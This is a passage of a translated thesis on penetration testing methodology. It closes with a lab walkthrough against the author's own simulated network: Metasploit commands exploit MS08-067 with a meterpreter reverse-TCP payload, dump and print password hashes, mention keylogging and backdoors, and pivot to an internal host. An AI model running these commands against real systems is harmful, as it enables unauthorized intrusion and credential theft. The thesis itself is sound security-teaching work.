OpenVAS (a powerful tool, a collection of many different individual tools, working in a client/server fashion), Cisco Auditing Tool (scans Cisco routers for weaknesses such as default passwords, SNMP strings, ...), bed (a powerful fuzzing tool), JBroFuzz (a popular platform for fuzz-testing web applications), ADMSnmp (an SNMP scanner), DBPwAudit (Java-based, checks the passwords of Oracle, MSSQL, MySQL and DB2 servers), SQLiX (an SQL injection vulnerability scanner written in Perl), SQLMap (automatically scans for, detects and exploits SQL injection flaws in URLs), Burp Suite (a powerful tool capable of scanning, analyzing and exploiting web application vulnerabilities manually or automatically), LBD (a small script that detects whether a website uses load balancing), Nikto (web server security scanner), ratproxy (a semi-automated web application security assessment tool using passive probing), WebScarab (a powerful web application security assessment tool that works as a proxy).
2.4.6. Social engineering
This is usually used only when the other steps fail to extract information or when the asset owner requests it. The art of deception can be of considerable importance when there are no open ports on the target network. By attacking the human element it is still possible to get into the target system, by tricking users into executing malicious code that opens a backdoor. Social engineering takes different forms. It may be anyone posing as a network administrator over the phone to trick you into revealing account information, or a fraudulent e-mail asking for the victim's bank account details. There are many possibilities that can be applied to achieve the objectives. Note that successful penetration sometimes requires extra time to understand human psychology before applying a suitable deception to the target. The main tool is the Social Engineering Toolkit (SET): it has many functions and makes it easy to prepare the technical conditions for a successful deception, such as creating Java applets, fake websites, phishing e-mails, ...
2.4.7. Target exploitation
After the vulnerabilities have been found, the target system can be penetrated based on the available types of exploit. Sometimes it may require research or modification of existing exploits to make them work correctly. This may sound somewhat difficult, but it can be easier with the tools provided in BackTrack. In addition, the tester can also apply client-side exploitation methods mixed with a little social engineering to take control of the target system. This phase therefore focuses mainly on the process of target acquisition. It coordinates three core areas, which involve pre-exploitation, exploitation and post-exploitation activities. The most commonly used tool is the Metasploit Framework [14]. It has three parts: libraries, interfaces and modules. The interfaces comprise MSFconsole, MSFcli and Armitage (GUI); the modules comprise exploit, payload, encoder, auxiliary and nop. Each part has a specific function. In addition, Metasploit Express and Metasploit Pro are commercial versions with a web interface.
Some concepts one needs to know when using Metasploit are:
Exploit: the means by which an attacker, or a penetration tester, takes advantage of a vulnerability in a system, application or service. An exploit can be understood as something that makes the system lose its bearings or fail to perform the functions the developer intended.
Payload: the code the attacker wants the system to execute after the exploit. Two commonly used techniques are the reverse shell, which makes the victim machine connect back to the attacker's machine, and the bind shell, which opens a command-line interface on an open port of the victim machine.
Shellcode: a set of instructions used as a payload, usually written in assembly language.
Encoder: used to encode the payload data to avoid detection by antivirus software and IDS.
Auxiliary: used to gather further information.
Listener: used to wait for the connection back from the victim machine.
2.4.8. Privilege escalation
Once the target has been acquired, the penetration has succeeded. The tester can move freely within the system according to the access rights obtained. These rights can also be escalated (raised) by using any local exploit that fits the system environment, usually up to administrator rights. There is also the possibility of compromising and learning more about the target by sniffing network traffic and cracking passwords. In short, the purpose of privilege escalation is to reach the highest level of access in the system.
Commonly used tools are: rainbowcrack (cracks passwords using rainbow tables), samdump2 (extracts Windows 2000/NT/XP/Vista password hashes from the SAM file), John (a tool for cracking passwords from hashes), wireshark (a network protocol analyzer), ettercap (an ARP spoofing tool for man-in-the-middle attacks).
2.4.9. Maintaining access
Sometimes the tester is asked to retain access to the system for a specified period. This can be used to demonstrate unauthorized access to the system without repeating the penetration testing process, which saves the time, cost and resources spent on gaining access to the system. Using tunneling methods through protocols or proxies can lead to an established backdoor. This kind of technique gives a clear view of how an attacker can maintain presence in the system without other noisy behavior.
Commonly used tools are: DNS2tcp (encapsulates TCP in DNS packets), Ptunnel (encapsulates TCP in ICMP (ping) packets), Proxychains (forces a connection to pass through a chain of proxies).
2.4.10. Documentation and reporting
Documentation and reporting present the vulnerabilities that were found, verified and exploited. From an ethical standpoint this is extremely important, because the management and technical teams can examine the penetration methods and try to close any security vulnerabilities discovered. These reports can also serve to compare the integrity of the target system before and after the penetration process.
2.4.11. Conclusions on the BackTrack method
BackTrack contains over 300 tools for penetration testing. These tools can be grouped according to the techniques described above. Although it is not a complete methodology, its focus on penetration testing makes it an excellent choice to combine with the other methods in the overall security testing process.
2.5. Some penetration testing tools
Every method needs accompanying tools to put it into practice. There are a great many individual tools supporting security testing in general and penetration testing in particular. Classifying these individual tools is difficult because one tool may have several functions that correspond to different testing stages. There are also tools, especially commercial ones, that integrate many functions and allow security testing to be carried out from the reconnaissance stage through to the conclusion and penetration, for example CORE Impact, Metasploit Pro, and so on. Most, however, are open-source tools collected in Linux distributions, which can be listed and briefly described as follows:
BackTrack [i1] is a Live Linux distribution on DVD developed specifically for penetration testing. Because it uses the Live DVD format, BackTrack can be used directly from the DVD without installing it on the computer. BackTrack can also be installed on a hard disk and used as a regular operating system. BackTrack is a merger of three different penetration testing Linux distributions: IWHAX, WHOPPIX and Auditor. In its current version (5.0), BackTrack is based on the Ubuntu Linux 8.10 distribution. BackTrack is expected to release version 5.0 Release 3 in mid-August 2012. It integrates hundreds of open-source tools that make penetration testing easier and faster.
KNOPPIX-STD [i20] is a Live CD/DVD based on the Debian distribution. It is a collection of hundreds of open-source security tools. It can be used as a firewall, IDS or honeypot, and for data recovery, vulnerability assessment, penetration testing and computer forensics.
FIRE [i22] is a Linux-based security toolkit that boots from CD, aimed at forensic analysis, incident response, data recovery, virus scanning and vulnerability analysis. Its strength is that it provides a forensic analysis environment for several operating systems: 32-bit Windows, SPARC Solaris and x86 Linux.
Helix [i23] is a Linux-based security toolkit that is strong in forensic analysis on three main platforms: Mac OS, Windows and Linux.
Samurai Web Testing Framework [i24] is a live Linux distribution pre-configured for penetration testing of web environments. Its CD contains a large number of open-source tools for testing and attacking websites.
PHLAK [i25] is a Linux distribution based on Morphix. PHLAK comes in two versions: FatMan, a large CD ISO, and LittleBoy, a slimmed-down version for a USB pen drive.
VAST [i21] is a Linux-based penetration testing toolkit specialized for VoIP and unified communications networks. It lets network security professionals and unified communications administrators quickly perform security assessments and vulnerability scans of IP phones and IP PBXs. VAST is built on Mint Linux 13.
2.6. Ethical issues for the penetration tester
Security testers in general, and penetration testers in particular, come into contact with customer assets that are usually sensitive, and this may be valuable information. If the tester cannot resist temptation and takes the information to sell to a third party, blackmails the owner, or publicly discloses the vulnerabilities to gain notoriety, the owner suffers great damage and the tester loses the trust of potential customer organizations. However, this issue is not treated consistently: some methods cover it in detail, OSSTMM for example, while others do not raise it at all. In the author's view this is an important issue, and standard rules need to be established so that the testing profession becomes ever more professional and ethical.
These rules define how testing services are to be offered, how testing must be performed, how contracts and legal negotiations are defined, how the scope of testing is defined, how the test plan is prepared, how the testing process is tracked, and how an appropriate report structure is managed. They can be summarized as follows:
Rules for marketing and selling security testing services
- Using the customer's fear, ignorance or doubt, and dishonesty in presentations, on websites, in supporting documents or in reports, for the purpose of selling or providing security testing, cannot be effective. Customers must receive honest advice concerning their security measures.
- Offering free services in return for penetrating targets is forbidden. Organizing public cracking and intrusion contests to promote the sale and marketing of security testing or security products is forbidden.
- Naming past or current customers in sales or marketing to prospective customers is allowed only if the customer has given written permission to use its name for that purpose.
Negotiation and contracts
- With or without a non-disclosure agreement, the security tester must keep customer information and test results confidential.
- The contract must clearly explain the limits and dangers of security testing as part of the statement of work.
- The customer must provide a signed statement granting indemnity to the penetration testers within the scope, and accepting liability for the costs and damages of the testing service, with the exception of proven malicious activity.
- The contract must include explicit and specific permission to test techniques such as denial of service, penetration testing and social engineering. The contract must have a procedure for follow-on contracts and for changes to the agreement.
Test scope
- The scope must be clearly defined in the contract before vulnerable services are examined.
- Performing security testing against any scope without explicit written permission from the target owner or the appropriate authority is strictly forbidden.
- Security testing of systems, locations and processes that are clearly unsafe and unstable is forbidden until appropriate security infrastructure has been put in place.
Test plan and process
- The test plan may not include plans, processes, techniques or procedures outside the tester's area of expertise or authority.
- The tester must respect and preserve the safety, health, welfare and privacy of all people both inside and outside the scope.
- The test plan states the required time milestones. Building a schedule that does not disrupt working hours is strongly encouraged.
- The tester must always comply with the laws of the place where the target is located, in addition to the rules and laws of the place from which the tester performs the test.
- Testers must thoroughly understand their tools, where the tools come from, how the tools work, and whether they have tried them in a restricted test area before using them at the customer's organization.
- Tests that involve people may only be performed on people within the scope and may not include individuals, customers, partners, affiliates or other outside entities without written permission from those entities.
- Serious limitations, or ones that could endanger the survival of the organization, discovered during testing must be reported to the customer immediately, with a practical remediation.
Reporting
- Test results and reports must be presented in a clear and consistent order. Reports must mark all known and unknown vulnerabilities.
- The tester must respect the privacy of all individuals and preserve privacy in all results. Reports must be objective, unbiased and not deliberately aimed at any individual.
- All communication channels used to deliver reports must be confidential end to end. Results and reports must never be used for commercial gain beyond their delivery to the customer.
2.7. Summary of chapter 2
Despite their differences, all the methods treat penetration testing as an important testing technique that reinforces the results obtained by other security testing techniques, and that detects complex vulnerabilities which are hard to find during development and vulnerabilities caused by a combination of several factors. Where OSSTMM places strong emphasis on security analysis, ISSAF and OWASP emphasize risk analysis. The following example shows the difference between risk analysis and security assessment: suppose a long, high wall represents security. Risk analysis considers what could get over the wall, whereas security analysis focuses on the cracks, on whether the foundation is solid, and on whether the wall is thick or high enough to stop or delay an intrusion long enough for the guards to arrive and respond to the attack. So risk analysis tries to discover vulnerabilities and map them to the related threats, while security analysis focuses on whether the controls are good and sufficient. In terms of overall coverage, OSSTMM and ISSAF address security testing in general, while OWASP focuses on penetration testing of web applications. The BackTrack method mainly collects and classifies penetration testing tools according to the testing stages that the method proposes. This method is introduced in detail in chapter 3.
There are many other methods besides these, as mentioned in the opening section. Within the scope of this thesis the author studies and introduces the three methods above, which are representative of the penetration testing methods used by organizations across industries worldwide. There is also a good deal of research into combining and comparing these methods for penetration testing, see for example [28] [29].
Chapter 3. APPLYING PENETRATION TESTING TO A NETWORK SYSTEM
3.1. Introduction
The first two chapters of the thesis presented the theoretical basis of security testing and penetration testing. Now it is time for practice to make that theory concrete. Among security testing techniques, penetration testing is always the most complex part, partly because security tools are increasingly sophisticated and powerful, which makes a successful penetration harder, and partly because the penetration testing tools themselves are complicated to use and usually several technologies and techniques must be combined for a single test. The methods above also introduce a few security tools, but which tool is used is largely a matter of habit, ease of use and installation, availability of documentation, and update speed. By those criteria BackTrack is currently a strong candidate. Furthermore, because the BackTrack method focuses mainly on penetration testing techniques, the author chose the BackTrack method and tools for the practical penetration testing part of this thesis.
3.2. The penetration testing process with BackTrack
The BackTrack method concentrates on describing penetration testing techniques; according to the method, however, these techniques do not follow a specific process and the penetration tester may use them freely. The author therefore proposes a simple penetration testing process based on the BackTrack tool groups. The process is shown in the figure below; depending on whether black-box or white-box testing is used, some steps such as information gathering and target discovery may be skipped. If the target owner requests it, or the other information gathering techniques give no results, the Social engineering step can be carried out. For large systems, where penetration testing takes a long time, a connection to an exploited target must be maintained, or evidence is needed to inform the owner, the Maintaining access step can be carried out.
Figure 14: Illustration of the BackTrack penetration testing process (diagram boxes: Target scope, Information gathering, Target discovery, Target enumeration, Vulnerability mapping, Social engineering, Target exploitation, Privilege escalation, Maintaining access, Documentation and reporting, Post-exploitation)
The BackTrack method does not mention Post-exploitation, the step that uses already exploited targets to go on and exploit deeper targets inside the network in order to learn more about the target network; it treats this as part of the Target exploitation technique. The author proposes it as an independent step because its exploitation techniques differ considerably from those of Target exploitation.
3.3. Building the simulated network
Technically, a simulated network can be built by creating a network of real computers, by using virtual machines, or by using a honeypot. Under the conditions of writing a thesis, building a network of real machines is costly and hardly feasible. Virtual machines use software to emulate a virtual computer complete with operating system and applications; in Vietnam the most widely used solutions today are VMware from VMware Inc. and Hyper-V from Microsoft. A honeypot uses special software to imitate a network or service in order to lure hackers away from the real system, or to entice hackers into intruding and record all their activity for study [30]. For the purpose of creating a simulated network, a honeypot has the advantage that every action of the tester is recorded. Its disadvantages are high complexity, difficult configuration and management, and the absence of a target in which vulnerabilities can actually be seen during testing. The virtual machine technique is simpler and more intuitive; its disadvantage is that it consumes a lot of physical resources on the host machine. After comparing the advantages and disadvantages of each solution, the author chose virtualization with Microsoft's Hyper-V. Figure 15 shows the model of the simulated network.
The operating systems used in the simulated network are mostly old and have not received patches for many years, so that many vulnerabilities will be found. The web server runs Windows 2000 Server with IIS as the web application; the database server is Linux Ubuntu with MySQL as the database. The workstations run Windows XP.
Figure 15: Diagram of the simulated network (diagram labels: Internet, NAT server, Web server, Database server, Workstation)
3.4. Penetration testing with BackTrack techniques
Because the author built the simulated network himself, black-box testing would hardly give objective results. The penetration test performed here therefore takes the white-box approach, in which the attacking side knows the configuration of the attacked network. From there we can begin the penetration test with the first step as follows:
Step 1: The target scope is the network with external address 172.16.17.111. The internal addresses are in the class C range 192.168.50.0/24; it runs a web service and a MySQL database.
The Information gathering step does not need to be performed. If it did, then besides searching Google and social networks, BackTrack has a very effective Google-based search tool, metagoofil, which looks for document files on the target website, and dnswalk or dmitry to find the DNS information held in the target's DNS server. If we are on the same LAN as the target, the p0f command gathers information passively, which limits the chance of detection but takes considerable time.
Step 2, Target discovery and Target enumeration: the first step usually uses the very common ping tool to see whether the target allows ICMP. arping uses ARP requests instead of ICMP to detect the target. There is also a tool that sweeps a whole subnet, genlist, which pings the IP addresses in the subnet one by one to find hosts that are up.
root@bt #genlist -s 172.16.17.0/24
172.16.17.1
172.16.17.10
172.16.17.111
A tool that can be used for both of the steps above is nmap, which examines what could give rise to attack vectors on address 172.16.17.111: the OS and its version, which ports are open, and the services running on those ports. nmap also takes the -A flag, which instructs it to guess the OS, services and versions running on the target.
root@bt# nmap -sS -Pn -A 172.16.17.111
...(truncated)
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 80/tcp open http Microsoft IIS httpd 6.0
[*] Nmap: 135/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 139/tcp open netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds Microsoft Windows 2003 or 2008 microsoft-ds
[*] Nmap: 1025/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 1026/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 3389/tcp open microsoft-rdp Microsoft Terminal Service
[*] Nmap: MAC Address: 00:15:5D:11:62:07 (Microsoft)
[*] Nmap: Running: Microsoft Windows 2000|XP|2003
[*] Nmap: OS details: Microsoft Windows 2000 SP2 - SP4, Windows XP SP2 - SP3, or Windows Server 2003 SP0 - SP2
We see that ports 80, 135, 139, 445, 1025, 1026, 3013 and 3389 are open and nmap guesses the service corresponding to each port; nmap also guesses that the OS running on the target is Windows 2003. To confirm this guess we can connect with Remote Desktop Connection; the screen returned by the remote machine confirms it.
Step 3: Vulnerability mapping. OpenVAS is used to look for vulnerabilities on the address discovered in step 1. OpenVAS comes pre-installed on BackTrack. For convenience, however, Nessus or NeXpose is a better choice for vulnerability scanning. These two tools are quite good and can save their findings in the database used by Metasploit Framework, but they are not pre-installed on BackTrack, so they must be downloaded and installed (the free editions are sufficient). In practice, where OpenVAS found 4 serious vulnerabilities, Nessus found 60 vulnerabilities, 10 of them serious. NeXpose found 18 vulnerabilities, but its strength is the function that indicates which exploits can be used with Metasploit; Figure 17 shows that 33 exploits are available for the 18 vulnerabilities found.
Figure 16: Vulnerability scan with Nessus
Figure 17: Vulnerability scan with NeXpose
The outstanding capability of Nessus and NeXpose is the plug-in that lets them run and store their results directly in Metasploit. We scan for vulnerabilities with Nessus using the following commands (for ease of reference the author numbered each command; the real interface shows no such numbers):
(1) msf > load nessus
(2) msf > nessus_connect nstung:abc123@localhost:8834
(3) msf > nessus_policy_list
(4) msf > nessus_scan_new -1 quet_may_111 172.16.17.111
(5) msf > nessus_report_list
[+] Nessus Report List
ID Name Status Date
-- ---- ------ ----
b77d3d45-bfa3-5b1e-f8dd-e8a3809dc1a926462bdddfa84f7a quet_may_111 completed 11:42 Aug 08 2012
(6) msf > nessus_report_get b77d3d45-bfa3-5b1e-f8dd-e8a3809dc1a926462bdddfa84f7a
(7) msf > vulns 172.16.17.111
(8) msf > search ms08_067
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
...(truncated)
exploit/windows/smb/ms08_067_netapi 2008-10-28 00:00:00 UTC great Microsoft Server Service Relative Path Stack Corruption
Command (1) loads the Nessus plug-in into Metasploit; from then on the help command also lists the Nessus commands. Command (2) connects to the Nessus server with the user account and password created when Nessus was installed. Command (3) lists the policies so that one can be chosen for the scan; the value in the ID column is passed as the first parameter of command (4). Command (4) actually creates a vulnerability scan task, with parameters as follows: -1 is the policy ID, quet_may_111 is the task name, and 172.16.17.111 is the target (this parameter may also be an address range, a host name or a subnet). Command (5) lists the reports created once command (4) has finished; to check whether the scan task is complete, use nessus_scan_status. Command (6) imports the report into the Metasploit database; its parameter is the report ID taken from command (5). Command (7) lists the vulnerabilities Nessus found, among which is one named ms08_067; this is passed to command (8) to find the matching exploit. Now we can move on to the next step.
Step 4: Exploit the vulnerability seen in command (8). For the MS08_067 vulnerability Metasploit has the matching exploit exploit/windows/smb/ms08_067_netapi; the use command loads it as follows:
(9) msf > use exploit/windows/smb/ms08_067_netapi
(10) msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
(11) msf exploit(ms08_067_netapi) > set RHOST 172.16.17.111
RHOST => 172.16.17.111
(12) msf exploit(ms08_067_netapi) > set LHOST 172.16.17.20
LHOST => 172.16.17.20
(13) msf exploit(ms08_067_netapi) > show targets
Exploit targets:
Id Name
-- ----
...(truncated)
7 Windows 2003 SP0 Universal
(14) msf exploit(ms08_067_netapi) > set target 7
target => 7
(15) msf exploit(ms08_067_netapi) > show options
...(truncated)
(16) msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 172.16.17.20:4444
[*] Sending stage (752128 bytes) to 172.16.17.111
[*] Meterpreter session 1 opened (172.16.17.20:4444 -> 172.16.17.111:4640) at 2012-08-10 16:20:41 +0700
meterpreter >
Each exploit has one or more payloads; to see which, run show payloads right after loading the exploit. The payload is chosen in command (10); commands (11), (12), (13) and (14) enter the parameters for the exploit and payload. Note that once command (9) has run, command (15) can be run at any time to check which parameters have been entered and whether they are correct; if the value in the required column is yes, that variable must be set. Finally command (16) runs the exploit. When the message highlighted by the oval in the figure appears, the exploit has succeeded and we are in the Meterpreter shell.
Note: Finding an exploit that matches a discovered vulnerability is far from easy. A tool called autopwn can therefore be used to look up exploits automatically, based on the scanned vulnerabilities stored in the Metasploit database, and run all of them in turn. It must be used with care, however, because firing exploits en masse at a target can crash it. Because it is so noisy it was removed in Metasploit v4, but it can still be found and used as a plug-in. There is also a safer tool, the vuln-exploit command in the auto_exploit plug-in, which lists the exploits that could be used against the vulnerabilities found.
Step 5: Now comes the Privilege escalation step, which can be done in several ways; the getsystem command raises our privileges to system level. Then the password hashes of the user accounts are obtained with the hashdump command.
(17) meterpreter > hashdump
Administrator:500:49d58563113416eb9c5014ae4718aee:41291269bf30dc4c9270a8b888e3bbe9:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
...(truncated)
With the password hashes there are several ways to crack the passwords; we concentrate on the Administrator account's password. The simplest way is to use password cracking websites on the Internet, for example http://crackstation.net/, as in Figure 16. We can also enter the target's shell and run net user to create a new user account and net localgroup to add the new account to the administrators group.
Figure 18: Using a website to crack the password
Another way is to use password cracking software such as John the Ripper, included in BackTrack, or Cain & Abel on Windows. If none of these ways works, keylog_recorder can be installed to capture the user's keystrokes with the command run post/windows/capture/keylog_recorder.
Step 6: Maintaining access. In this step, because the administrator password has been obtained and the target allows Remote Desktop, maintained access has already been achieved in this case. If conditions were not so favorable, telnet could be used (create a user and start telnet with the run gettelnet command in meterpreter). If neither condition holds, a backdoor can be installed.
Step 7: Post-exploitation. This is the step of finding and exploiting further vulnerabilities on other systems inside the target network, which could not be seen before the attack was completed. The technique is called pivoting: it uses the first target, already compromised, to attack further targets. First we use ifconfig or run get_local_subnets, as in command (18), to learn which internal network our target is connected to and what the internal subnet is.
(18) meterpreter > run get_local_subnets
Local subnet: 172.16.17.0/255.255.255.0
Local subnet: 192.168.50.0/255.255.255.0
(19) meterpreter > background
[*] Backgrounding session 1...
(20) msf exploit(ms08_067_netapi) > route add 192.168.50.0 255.255.255.0 1
[*] Route added
(21) msf exploit(ms08_067_netapi) > route print
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
192.168.50.0 255.255.255.0 Session 1
(22) meterpreter > msfmap 192.168.50.0/24
Starting MSFMap 0.1.1
MSFMap scan report for 192.168.50.1
Host is up.
Not shown: 92 closed ports
PORT STATE SERVICE
23/tcp open telnet
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
3389/tcp open ms-wbt-server
MSFMap scan report for 192.168.50.2
Host is up.
Not shown: 96 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MSFMap scan report for 192.168.50.21
Host is up.
Not shown: 98 closed ports
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MSFMap done: 256 IP address (3 hosts up) scanned in 59.18 seconds
The background command in (19) sends meterpreter to the background. route add, as in (20), routes traffic for 192.168.50.0/24 through session 1. Command (21) checks the routing table. At this point, if conditions allow, nmap can be installed on target 1 to scan the internal network. Command (22) uses msfmap to find the hosts on the internal network and the open ports on each. Another option is the auxiliary module auxiliary/scanner/portscan/tcp to scan ports on the internal hosts, as follows:
(23) msf > use auxiliary/scanner/portscan/tcp
(24) msf auxiliary(tcp) > show options
(25) msf auxiliary(tcp) > set RHOSTS 192.168.50.0/24
RHOSTS => 192.168.50.0/24
(26) msf auxiliary(tcp) > set THREADS 255
THREADS => 255
(27) msf auxiliary(tcp) > run
[*] 192.168.50.1:23 - TCP OPEN
[*] 192.168.50.2:22 - TCP OPEN
...(truncated)
[*] 192.168.50.21:445 - TCP OPEN
Command (23) loads the required module; command (24) shows which parameters must be entered: here the mandatory parameter RHOSTS is set in command (25) and the optional parameter THREADS is set in command (26) to speed things up; finally command (27) runs the module. Comparing the results of commands (22) and (27), command (22) gives the better result. The internal network contains the addresses 192.168.50.2 and 192.168.50.21. By a stroke of luck, when gathering information about target 1 with the run winenum command, the list of NetBIOS names near target 1 contained the name XP01; ping xp01 revealed that this is address 192.168.50.21, probably a Windows XP machine and the easiest target to exploit. We start a proxy server and use it to route to the target through machine 1, as in commands (28) and (29) below:
(28) msf auxiliary(tcp) > use auxiliary/server/socks4a
(29) msf auxiliary(socks4a) > run
[*] Starting the socks4a proxy server
(30) msf auxiliary(socks4a) > use exploit/windows/smb/ms08_067_netapi
(31) msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp_allports
PAYLOAD => windows/meterpreter/reverse_tcp_allports
(32) msf exploit(ms08_067_netapi) > set RHOST 192.168.50.21
RHOST => 192.168.50.21
(33) msf exploit(ms08_067_netapi) > set LPORT 4445
LPORT => 4445
(34) msf exploit(ms08_067_netapi) > show options
(35) msf exploit(ms08_067_netapi) > exploit
...(truncated)
[*] Meterpreter session 2 opened (172.16.17.20:4445 -> 172.16.17.111:2756) at 2012-08-15 23:57:56 +0700
meterpreter >
To find the vulnerabilities of the internal targets we could use Nessus routed through proxychains. At the time of writing, however, proxychains on 64-bit BackTrack 5 R2 had an unresolved bug, so finding internal vulnerabilities with Nessus was not possible. Based on the information gathered, the author judged that the Windows XP SP3 machine was likely to have the MS08-067 vulnerability, so the exploit module and payload were loaded as in commands (30) and (31); commands (32) and (33) set the parameters; command (34) checks them; and finally command (35) runs the exploit, which succeeded, giving a meterpreter shell in session 2. The author also tried exploiting a few typical Linux vulnerabilities against the Ubuntu target, without success. With that, the penetration test of the simulated network is complete, and it is time to report and evaluate.
3.5. Reporting and evaluation
After completing the penetration test in section 3.4, the author had found 3 machines on the simulated network: one Windows 2003 Server; one Ubuntu machine whose version was not detected; and one Windows XP SP3 machine. The penetration test results obtained with the BackTrack tools are shown in the following table:
Item | Machine 1 | Machine 2 | Machine 3
Address | 172.16.17.111, 192.168.1.1 | 192.168.1.2 | 192.168.1.21
Hostname | Test01 | Not detected | XP01
OS | Windows 2000 SP0 | Not detected | Windows XP SP3
Open ports | 80, 135, 139, 445, 1025, 1026, 3013, 3389 | 22, 80, 139, 445 | 139, 445
Services | www, epmap, netbios-ns, smb, dce-rpc, msrdp | ssh, http, netbios-ssn, microsoft-ds | netbios-ssn, microsoft-ds
Number of vulnerabilities | 60 | 0 | 1
Attack direction | Direct | Pivoting | Pivoting
Exploit used | exploit/windows/smb/ms08_067_netapi | | exploit/windows/smb/ms08_067_netapi
Intrusion result | Successful | Unsuccessful | Successful
Remediation direction | Install the patch per Microsoft Security Bulletin MS08-067 | None | Install the patch per Microsoft Security Bulletin MS08-067
Conclusion | The OS version still could not be identified exactly. Intruding into and compromising the system was quite easy. | The Linux OS makes the target hard to detect. The pivot attack direction also hinders the chance of success. | Windows XP is quite easily compromised by attacks even through a pivot.
Remediation plan | Install the patch for Windows 2003 Server from http://technet.microsoft.com/en-us/security/bulletin/ms08-067 | | Install the patch for Windows XP from http://technet.microsoft.com/en-us/security/bulletin/ms08-067
References | BID: 31874; CERT: TA08-297A; CVE: CVE-2008-4250; MS: MS08-067; SECUNIA: 32326 | | BID: 31874; CERT: TA08-297A; CVE: CVE-2008-4250; MS: MS08-067; SECUNIA: 32326
Table 9: Penetration test results
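The rows of Table 9 were assembled by hand from the scan output captured in section 3.4. As an added example (not code from the thesis), the following Python script parses scan output in the nmap and MSFMap formats shown there into one row per host and attaches the MS08-067 remediation reference that Table 9 cites to hosts exposing SMB on a covered OS family; the sample scan text, the Host class and the findings_table() helper are constructed here.

```python
"""Build per-host findings rows (as in Table 9) from captured scan output.

Added example, not code from the thesis: it parses the nmap-style and
MSFMap-style port listings shown in section 3.4 into a host inventory and
attaches the remediation reference Table 9 gives (MS08-067 / CVE-2008-4250)
to hosts that expose SMB on an OS family that bulletin covers. The sample
scan text below is constructed to mirror the page's output format.
"""
import re
from dataclasses import dataclass, field

# Constructed sample: nmap lines as echoed inside msfconsole, then MSFMap output.
SAMPLE_SCAN = """\
[*] Nmap: Nmap scan report for 172.16.17.111
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 80/tcp open http Microsoft IIS httpd 6.0
[*] Nmap: 135/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 445/tcp open microsoft-ds Microsoft Windows 2003 or 2008 microsoft-ds
[*] Nmap: 3389/tcp open microsoft-rdp Microsoft Terminal Service
[*] Nmap: Running: Microsoft Windows 2000|XP|2003
MSFMap scan report for 192.168.50.2
Host is up.
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
445/tcp open microsoft-ds
MSFMap scan report for 192.168.50.21
Host is up.
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
"""

PREFIX_RE = re.compile(r"^\[\*\] Nmap:\s*")          # msfconsole echo prefix
HOST_RE = re.compile(r"^(?:Nmap|MSFMap) scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)(?:\s+(.*))?$")
OS_RE = re.compile(r"^Running: (.*)$")

# Remediation reference as listed in Table 9 of the thesis.
MS08_067 = "Install the patch from Microsoft Security Bulletin MS08-067 (CVE-2008-4250)"
MS08_067_FAMILIES = ("Windows 2000", "XP", "2003")


@dataclass
class Host:
    address: str
    ports: list = field(default_factory=list)  # (port, proto, service)
    os_guess: str = ""

    def open_ports(self):
        return [p for p, _, _ in self.ports]

    def services(self):
        return [s for _, _, s in self.ports]


def parse_scan(text):
    """Split captured scan output into Host records (open ports only)."""
    hosts, current = [], None
    for raw in text.splitlines():
        line = PREFIX_RE.sub("", raw.strip())
        m = HOST_RE.match(line)
        if m:
            current = Host(m.group(1))
            hosts.append(current)
            continue
        if current is None:
            continue
        m = PORT_RE.match(line)
        if m and m.group(3) == "open":
            current.ports.append((int(m.group(1)), m.group(2), m.group(4)))
            continue
        m = OS_RE.match(line)
        if m:
            current.os_guess = m.group(1)
    return hosts


def remediation(host):
    """Map an exposed SMB service to the bulletin Table 9 cites, or flag it."""
    smb_exposed = 445 in host.open_ports()
    covered = any(f in host.os_guess for f in MS08_067_FAMILIES)
    if smb_exposed and covered:
        return MS08_067
    if smb_exposed:
        return "SMB exposed; confirm the OS version before selecting a patch"
    return "None"


def findings_table(text):
    """One row per host with the columns Table 9 uses."""
    return [
        {
            "address": h.address,
            "open_ports": h.open_ports(),
            "services": h.services(),
            "os": h.os_guess or "Not detected",
            "remediation": remediation(h),
        }
        for h in parse_scan(text)
    ]


if __name__ == "__main__":
    for row in findings_table(SAMPLE_SCAN):
        print(row)
```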
Below is the list of software used during the penetration test and the degree of success of each, rated as follows: poor means unusable or giving incorrect results; average means incomplete results; good means correct results; excellent means correct results that are easy to reuse in other software.
No. | Software | Rating mark (Excellent / Good / Average / Poor; the column in which each mark falls was lost in the text extraction)
1 | Hping2 | x
2 | Genlist | x
3 | Nessus | x
4 | NeXpose | x
5 | Nmap | x
6 | Metasploit framework | x
7 | Proxychains | x
8 | Cain & Abel | x
9 | OpenVAS | x
10 | John the Ripper | x
Table 10: Evaluation of the tools used in the penetration test
From this evaluation table it can be seen that Nmap, Nessus, NeXpose and Metasploit play the key roles in the penetration testing process. Nmap handles target analysis, Nessus and NeXpose handle vulnerability detection, and Metasploit in particular builds on the results of those tools to exploit vulnerabilities, escalate privileges and maintain access. Metasploit framework itself also ships many port scanning and vulnerability scanning tools that can be used in addition.
For a penetration test report template, the STAR report template can be consulted; it presents the whole penetration testing process and its results, and can be combined with the report generated by NeXpose, which records the vulnerabilities that tool found together with remediation guidance for them. The difficulty with this approach is that the templates are all in English, so the penetration testing team must translate and adapt them to Vietnamese. Any individual or organization working in penetration testing must build its own report template, agreed within the team, for long-term use.
